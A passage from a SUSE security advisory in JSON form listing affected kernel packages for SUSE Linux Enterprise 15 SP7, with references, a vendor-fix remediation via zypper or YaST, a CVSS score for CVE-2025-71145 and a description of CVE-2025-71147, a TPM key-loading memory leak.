"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
